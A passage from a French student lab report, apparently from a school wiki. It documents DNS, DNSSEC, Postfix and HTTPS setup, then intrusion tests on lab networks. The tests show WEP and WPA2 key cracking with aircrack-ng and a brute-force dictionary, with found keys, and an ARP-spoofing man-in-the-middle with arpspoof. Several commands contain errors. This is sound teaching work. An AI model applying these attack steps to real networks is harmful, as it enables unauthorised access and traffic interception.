&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
